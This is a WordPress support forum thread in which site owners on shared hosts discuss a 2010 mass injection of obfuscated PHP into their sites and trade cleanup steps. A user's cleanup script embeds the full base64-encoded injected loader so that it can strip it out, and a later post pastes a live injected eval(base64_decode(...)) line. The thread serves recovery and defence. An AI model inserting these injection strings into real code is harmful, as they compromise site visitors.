WordPress › Support » Site Hacked

Steve D
Member
Posted 2 years ago #

I think its safe to assume that these attacks being launched upon the big host's are of a new and different nature. They appear to be using techniques that are designed to overwhelm the servers in stealth by attacking every hole possible they can exploit quickly and efficiently. They obviously are targeting website owners who don't have their site secured according reasonable protocols and is asleep at the wheel" doors open everywhere. Even more worrisome is the possibility of rouge accounts being set up.

That would mean Hosting providers are going to have to tighten up the requirements for shared hosting and impose a set of security standards one has to meet to get a shared hosting account. An application for shared hosting sort of speak.
John Hoff
Member
Posted 2 years ago #

Everyone, this is not a targeted WordPress attack, I don't think.

It looks more like someone (or people) simply trying to hack PHP sites.

That includes Joomla, osCommerce, Magento, Drupal, SMF, other forum software, chat software, etc.

Restore your files and you should be good to go.
Steve D
Member
Posted 2 years ago #

WpBlogHost

They are targeting everything and anything . . and obviously succeeded.

Rule Number One. Backup, Backup, Backup.

Rule Number Two. Obey the first rule.
ClaytonJames
Member
Posted 2 years ago #

I am surprised - stunned actually - by the complete lack of any conversation regarding information gathered by (regularly) viewing or investigating access and error logs. I'm not certain which direction I should lean in when attempting to interpret what that might actually imply.

Has anyone come across anything in their logs that set off any red flags for them? Not to single out GoDaddy, but, because they seems to be the topic of the moment... Does GoDaddy provide access to logs with their hosting plans?
Steve D
Member
Posted 2 years ago #

Latest from wpsecuritylock.com

UPDATE 5/1/2010 at 3:09 pm (CST): We just found some mystery files and code.

CAUTION: We just found some weird code in a WordPress wp-config.php file. This code was injected on April 21 on a site we are fixing now.

$GLOBALS['mr_no'] = 1;

We also found a mystery file in the root: test-soc.php,which contains the base64_decode script.

Please check your websites for this now.

If anyone has information as to what this is, please let us know.
patrickcurl
Member
Posted 2 years ago #

My sites have also been infiltrated. We're starting up a movement on Twitter to get godaddy to act on it - just tweet about your issue, and use the hashtag #ihategodaddy I'm @patrickcurl if you want to follow me.

One trick in godaddy is to go to your hosting filemanager and click on history select all your files and folders and select all folders and directories and hit restore this will hopefully restore them to an earlier date..

Takes some time if you have a lot of folders though -- but you should then check all your files to make sure they are clean.
redkathy
Member
Posted 2 years ago #

That is what the April 21 attack did to the wp-config file. Today's attack was a different base 64 code which redirected to a different site. I didn't see the [mr_no] this time however as soon as I got the redirect, I restored everything. It's not there now.
Steve D
Member
Posted 2 years ago #

The two common links here are these attacks are focused on shared hosting, in particular two of the biggest host providers.

How are we supposed to secure our WordPress assets in this kind of environment? Whats it going to take?

I've done everything expected of a professional who takes their work seriously and beyond. 18 hour days 7 days a week no time for play and goofing off.

It almost seems like mission impossible at this point trying to secure the software.
Steve D
Member
Posted 2 years ago #

Most frustrating is trying to get information on what happened and how it happened.
ClaytonJames
Member
Posted 2 years ago #

Most frustrating is trying to get information on what happened and how it happened.

Opinions seem to be all over the place, but I thought these to be the most coherent, and well organized aggregation of thoughts and opinions ( in my own opinion ), that I've seen so far on the whole situation.

//www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

//www.wpsecuritylock.com/breaking-news-dangerous-malware-alert-self-hosted-sites-on-major-hosting-service-hacked-again/

Perhaps some thought provoking information - as well as timely updates on the situation - could be found in those articles. I certainly see a couple of interesting links listed there.
redkathy
Member
Posted 2 years ago #

Can anyone say for certain it does not infiltrate the date base files?
Steve D
Member
Posted 2 years ago #

Can anyone say for certain it does not infiltrate the date base files?

I believe it did cause some changes to be made in certain database tables on a few lines but nothing explosive. Something to do with a new url being placed in wp_options. I checked mine and that was clean. I don't know if this is happening in this situation.

I was monitoring for intrusions since the week of April 7 when rumors began and thought I may have escaped up until the 18th when I and a bunch of other sites were hit. Cleaned up and was hit again on the 24th right after midnight. I am still monitoring because I have no conclusive evidence we are "all clear" yet.
Steve D
Member
Posted 2 years ago #

5 hours, 21 minutes ago: godaddy

Recently some people have been seeing malware injections into their WordPress sites and even though they have attempted to clean it, the malicious code resurfaces. This is usually because either the source of the compromise (usually outdated WordPress versions or weak FTP passwords) was not fixed, or the malicious code was not fully removed.

If you haven’t already, please read this message from our Chief Information Security Officer, Todd Redfoot http://community.godaddy.com/support/?ci=19370

If you’re concerned you have been compromised with a malware script injection, you should search your content (the .php files WordPress uses) for anything that says ”eval(base64_decode(” and remove that line.

Many of these compromises also are accomplished by scripts adding users to WordPress and then injecting malicious code. You should review the users you have in your wp-admin control panel and make sure there aren’t any you didn’t intend to have.

We have seen malware files in image directories such as wp-includes/js/tinymce/themes/advanced/skins/default/img/style.css.php

There is a short term temporary fix, and that is to use the File Manager’s ”History” feature to restore your site content to a date you know was before your site was compromised (this won’t affect posts). Steps are here: http://help.godaddy.com/article/5091 If however you do not see the ”History” feature in the File Manager, please contact our support team 24/7 at 480-505-8877 for assistance restoring your site’s content.

The permanent fix is to follow these steps to ensure it is fully cleaned and to prevent a recurrence. This is the best method to ensure it is 100% clean.

1. Backup the database http://community.godaddy.com/help/2009/10/12/backing-up-and-restoring-mysql-or-mssql-databases/
2. Make a note of the customizations, such as plugins or any other modifications you’ve made.
3. Remove all files from the site, be sure to save anything that isn’t part of WordPress!
4. Reinstall WordPress through Hosting Connections
5. Restore the database (see the above article)
6. Verify the WordPress users are correct and authorized
7. Re-install any plugins you were using
8. Reload any additional .php files from known clean copy

This is the best way to ensure the site was not attacked previously and has hidden backdoors loaded deep into the site.

It is extremely important to keep your WordPress software up to date and use strong passwords for your WP admin, FTP and Database, and that you don’t use the same password for all of them.

If you have WordPress installed on your hosting account but are not using it, we recommend removing it.
ClaytonJames
Member
Posted 2 years ago #

Some GoDaddy link-a-fication goodness for ya'.

Sorta' like forum shorthand. :-)

WordPress Compromised? How to fix it!

Customer Communications
redkathy
Member
Posted 2 years ago #

I believe it did cause some changes to be made in certain database tables on a few lines but nothing explosive. Something to do with a new url being placed in wp_options. I checked mine and that was clean. I don't know if this is happening in this situation.
How do you check the db files? Download, change to.txt and read?
John Hoff
Member
Posted 2 years ago #

@Steve D - GoDaddy gave some decent advice there, but it's probably only good for people like us who know how to do this stuff in our sleep.

To those who don't know much about all this, please be very careful if you plan to delete / replace files and databases. Always make sure you back up both your files in your File Manager and also your database before attempting anything.

If you're not sure what to do or how to do it, consult a WordPress service tech.

Also, check out this plugin to help thwart the base64 hack.
http://wordpress.org/extend/plugins/block-bad-queries/

But realize that if the hack is coming through someone hacking the web hosting company (and not necessarily your blog), there's little you can do to stop the hacker.

In this case, the best you can do is be prepared by:
- setting up a file monitoring service (I like WordPress File Monitor plugin)
- Using the 4G Blacklist .htaccess rules (see my earlier comment)
- Keep full backups of your hosting files and your database regularly
- Install the WordPress Firewall Plugin
John Hoff
Member
Posted 2 years ago #

@redkathy - you can export your database. Make sure it's a .sql file before viewing... if it's a zip file, unzip it first.

Then use a program like WordPad to open the file so you can view it.

You can then do a Find search for whatever it is you're looking for.
redkathy
Member
Posted 2 years ago #

@WpBlogHost -Thanks for the instruction. The first attack I was so very lost, it took forever to clean the sites. This time not so bad. I hope we don't get used to doing this :(
redkathy
Member
Posted 2 years ago #

@WpBlogHost - export and back up file, the same thing?
John Hoff
Member
Posted 2 years ago #

Yes.
Steve D
Member
Posted 2 years ago #

Worth the read . .

Anonymous said...

I was called in to look at some hosting servers at a small company that got hit with something similar to this earlier this year. Their hosted sites were php, asp and coldfusion sites (no wordpress, joomla or any sort of control panel). All index/home/main/default files - regardless of whether they were php, asp, cfm or even html had various javascripts included. It certainly looked like it was an FTP exploit with either privilege escalation so their bot could traverse user directories and write, or they somehow got the ftp user/pass db. Logs did not indicate brute force attacks. File changes came from multiple locations around the world.
Go Daddy
Member
Posted 2 years ago #

All,

We've posted instructions for fixing the issue at http://fwd4.me/MFK. Please make sure that you follow all of the steps, including the 'permanent fix'.

Salem
qab
Member
Posted 2 years ago #

ok the solution go daddy is giving respectfully is useless,

my website has joomla installed and is hosted in a godaddy server, I'm proud to say I have completely removed the virus using my own scripting skills, all it took was 10 mins. the virus is hardly that, its just code that somehow bypassed godaddy's security and was able to write itself to all php files.

qab
Member
Posted 2 years ago #

this is the script I developed and used with success,
its kind of tricky, you need to do a couple of things before using the script

run this command in the SSH: find . -name "*.php" -type f -print‏

that will display all PHP files in your directory including subdirectories

if you dont know how to execute it just use a cron job it should email it to you with no problem,

now you save it in a txt file named "php.txt"

upload php.txt with anything.php, anything.php contains the following:
(please change what i ask you to change)
the script isint perfect but should do the job ,

only use this as a last resort, backup your website before use as well. just incase

<?php
  $files = file_get_contents('php.txt');

  $afiles= explode("\n", $files);

   for($i=0;$i<count($afiles);$i++){ //you mite want to lessen the loops if your website is big
    qabandi($afiles[$i]);
   }

 function qabandi($file){
$sick = "{rest of location}".trim($file);//this is where you add the rest of location
$content = file_get_contents($sick);
$handle = fopen($sick, "w+");

$clean = str_replace(bad(), "", $content);

fwrite($handle,$clean);
fclose($handle);
echo($sick."[cleaned]\n");

}

 function bad(){ return base64_decode("PD9waHAgLyoqLyBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9ablZ1WTNScGIyNWZaWGhwYzNSektD
ZHZZbDl6ZEdGeWRDY3BKaVloYVhOelpYUW9KRWRNVDBKQlRGTmJKMjF5WDI1dkoxMHBLWHNnSUNB
a1IweFBRa0ZNVTFzbmJYSmZibThuWFQweE95QWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1v
SjIxeWIySm9KeWtwZXlBZ0lDQWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1vSjJkdGJDY3BL
WHNnSUNBZ0lHWjFibU4wYVc5dUlHZHRiQ2dwZXlBZ0lDQWdJR2xtSUNnaGMzUnlhWE4wY2lna1gx
TkZVbFpGVWxzaVNGUlVVRjlWVTBWU1gwRkhSVTVVSWwwc0ltZHZiMmRzWldKdmRDSXBKaVlnS0NG
emRISnBjM1J5S0NSZlUwVlNWa1ZTV3lKSVZGUlFYMVZUUlZKZlFVZEZUbFFpWFN3aWVXRm9iMjhp
S1NrcGV5QWdJQ0FnSUNCeVpYUjFjbTRnWW1GelpUWTBYMlJsWTI5a1pTZ2lVRWhPYW1OdGJIZGtR
MEo2WTIxTk9VbHRhREJrU0VFMlRIazVjbHBIY0hKYWJYQjZZVEpTYldGdGVIcGhNbEp4V21rMWFt
SXlNSFpoTTBGMVkwZG9kMGxxTkRoTU0wNXFZMjFzZDJSRU5EMGlLVHNnSUNBZ0lDQjlJQ0FnSUNB
Z2NtVjBkWEp1SUNJaU95QWdJQ0FnZlNBZ0lDQjlJQ0FnSUNBZ0lDQnBaaWdoWm5WdVkzUnBiMjVm
WlhocGMzUnpLQ2RuZW1SbFkyOWtaU2NwS1hzZ0lDQWdJR1oxYm1OMGFXOXVJR2Q2WkdWamIyUmxL
Q1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXBleUFnSUNBZ0lD
UlNNekJDTWtGQ09FUkRNVFE1TmtRd05rSXlNekJCTnpGRU9EazJNa0ZHTlVROVFHOXlaQ2hBYzNW
aWMzUnlLQ1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXNNeXd4
S1NrN0lDQWdJQ0FnSkZKQ1JUUkRORVF3TXpkRk9UTTVNakkyUmpZMU9ERXlPRGcxUVRVelJFRkVP
VDB4TURzZ0lDQWdJQ0FrVWtFelJEVXlSVFV5UVRRNE9UTTJRMFJGTUVZMU16VTJRa0l3T0RZMU1r
WXlQVEE3SUNBZ0lDQWdhV1lvSkZJek1FSXlRVUk0UkVNeE5EazJSREEyUWpJek1FRTNNVVE0T1RZ
eVFVWTFSQ1kwS1hzZ0lDQWdJQ0FnSkZJMk0wSkZSRVUyUWpFNU1qWTJSRFJGUmtWQlJEQTNRVFJF
T1RGRk1qbEZRajFBZFc1d1lXTnJLQ2QySnl4emRXSnpkSElvSkZJMVFUbERSakZDTkRrM05UQXlR
VU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXd4TUN3eUtTazdJQ0FnSUNBZ0lDUlNOak5DUlVSRk5r
SXhPVEkyTmtRMFJVWkZRVVF3TjBFMFJEa3hSVEk1UlVJOUpGSTJNMEpGUkVVMlFqRTVNalkyUkRS
RlJrVkJSREEzUVRSRU9URkZNamxGUWxzeFhUc2dJQ0FnSUNBZ0pGSkNSVFJETkVRd016ZEZPVE01
TWpJMlJqWTFPREV5T0RnMVFUVXpSRUZFT1NzOU1pc2tVall6UWtWRVJUWkNNVGt5TmpaRU5FVkdS
VUZFTURkQk5FUTVNVVV5T1VWQ095QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6
RTBPVFpFTURaQ01qTXdRVGN4UkRnNU5qSkJSalZFSmpncGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRB
ek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1UFVCemRISndiM01vSkZJMVFUbERSakZD
TkRrM05UQXlRVU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXhqYUhJb01Da3NKRkpDUlRSRE5FUXdN
emRGT1RNNU1qSTJSalkxT0RFeU9EZzFRVFV6UkVGRU9Ta3JNVHNnSUNBZ0lDQjlJQ0FnSUNBZ2FX
WW9KRkl6TUVJeVFVSTRSRU14TkRrMlJEQTJRakl6TUVFM01VUTRPVFl5UVVZMVJDWXhOaWw3SUNB
Z0lDQWdJQ1JTUWtVMFF6UkVNRE0zUlRrek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEazlRSE4w
Y25CdmN5Z2tValZCT1VOR01VSTBPVGMxTURKQlEwRXlNME00UmpZeE1VRTFOalEyT0RSRExHTm9j
aWd3S1N3a1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1S1NzeE95
QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6RTBPVFpFTURaQ01qTXdRVGN4UkRn
NU5qSkJSalZFSmpJcGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0
T0RWQk5UTkVRVVE1S3oweU95QWdJQ0FnSUgwZ0lDQWdJQ0FrVWpBek5FRkZNa0ZDT1RSR09UbERR
emd4UWpNNE9VRXhPREl5UkVFek16VXpQVUJuZW1sdVpteGhkR1VvUUhOMVluTjBjaWdrVWpWQk9V
TkdNVUkwT1RjMU1ESkJRMEV5TTBNNFJqWXhNVUUxTmpRMk9EUkRMQ1JTUWtVMFF6UkVNRE0zUlRr
ek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEa3BLVHNnSUNBZ0lDQnBaaWdrVWpBek5FRkZNa0ZD
T1RSR09UbERRemd4UWpNNE9VRXhPREl5UkVFek16VXpQVDA5UmtGTVUwVXBleUFnSUNBZ0lDQWtV
akF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVelBTUlNOVUU1UTBZeFFq
UTVOelV3TWtGRFFUSXpRemhHTmpFeFFUVTJORFk0TkVNN0lDQWdJQ0FnZlNBZ0lDQWdJSEpsZEhW
eWJpQWtVakF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVek95QWdJQ0Fn
ZlNBZ0lDQjlJQ0FnSUdaMWJtTjBhVzl1SUcxeWIySm9LQ1JTUlRneVJVVTVRakV5TVVZM01EazRP
VFZGUmpVMFJVSkJOMFpCTmtJM09FSXBleUFnSUNBZ1NHVmhaR1Z5S0NkRGIyNTBaVzUwTFVWdVky
OWthVzVuT2lCdWIyNWxKeWs3SUNBZ0lDQWtVa0V4TnpsQlFrUXpRVGRDT1VVeU9FTXpOamxHTjBJ
MU9VTTFNVUk0TVVSRlBXZDZaR1ZqYjJSbEtDUlNSVGd5UlVVNVFqRXlNVVkzTURrNE9UVkZSalUw
UlVKQk4wWkJOa0kzT0VJcE95QWdJQ0FnSUNCcFppaHdjbVZuWDIxaGRHTm9LQ2N2WER4Y0wySnZa
SGt2YzJrbkxDUlNRVEUzT1VGQ1JETkJOMEk1UlRJNFF6TTJPVVkzUWpVNVF6VXhRamd4UkVVcEtY
c2dJQ0FnSUNCeVpYUjFjbTRnY0hKbFoxOXlaWEJzWVdObEtDY3ZLRnc4WEM5aWIyUjVXMTVjUGww
cVhENHBMM05wSnl4bmJXd29LUzRpWEc0aUxpY2tNU2NzSkZKQk1UYzVRVUpFTTBFM1FqbEZNamhE
TXpZNVJqZENOVGxETlRGQ09ERkVSU2s3SUNBZ0lDQjlaV3h6WlhzZ0lDQWdJQ0J5WlhSMWNtNGdK
RkpCTVRjNVFVSkVNMEUzUWpsRk1qaERNelk1UmpkQ05UbEROVEZDT0RGRVJTNW5iV3dvS1RzZ0lD
QWdJSDBnSUNBZ2ZTQWdJQ0J2WWw5emRHRnlkQ2duYlhKdlltZ25LVHNnSUNCOUlDQjkiKSk7Pz4=");}function good(){return base64_decode("PD9QSFAgLyphbC1xYWJhbmRpQGhvdG1haWwuY29tKi8gPz4=");}

?>

Steve D
Member
Posted 2 years ago #

These criminals have discovered serious vulnerabilities in many popular hosting companies, and these companies must step up their effort to protect their customers.

That's really the bottom line.
petercasier
Member
Posted 2 years ago #

In the mean time, it is clear that not only WP sites were attacked on Godaddy (I run a Drupal site, and it was attacked too. The "base64_decode" line was injected into every single .PHP file.

While it is clear how to restore the site, what I have not seen so far is what Godaddy is doing to recognize the problem is not WP or any other CMS, but a vulnerability on their side.

can't cure a sick person if the sick person does not recognize he is sick.

Peter
qab
Member
Posted 2 years ago #

Yes I agree petercasier, It is not a vulnerability in wordpress,joomla or drupal, its a vulnerability in godaddy itself as a host, this is very disappointing I must say.
helpme11
Member
Posted 2 years ago #

can anyone locate where these hackers are from!!????

this is not funny!!
Robbo Mills
Member
Posted 2 years ago #

I also got hacked. ALL the .php files on my site(s) are infected with the following:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzEvZDE3MjUyNDQ1Mi9odGRvY3MvYmxvZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3BsdWdpbnMvaW5saW5lcG9wdXBzL3NraW5zL2NsZWFybG9va3MyL2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

And there were some strange additions to the .htaccess file in the logs folder. I'm hosted by 1and1.com and have sent them a ticket on this but haven't heard back yet. From what I've read here it's not just WordPress and it's also pretty widespread.

What ticks me off is the amount of work I had to do for just ONE of my blogs to clean up this crap (including replacing the MySQL database) and I can't bear the thought of having to do that for EACH AND EVERY ONE of my other sites.

Is there some kind of script or some mojo thingee that can grind through all this and remove it? I'm not enough of a code monkey to figure it out myself - I only know enough to screw things up unless I have very clear instructions.

Anyone? Anyone? Bueller?

thanks

« Previous 12

Topic Closed

This topic has been closed to new replies.

WordPress.org

Forums

Site Hacked (59 posts)

Topic Closed

About this Topic

Tags

Code is Poetry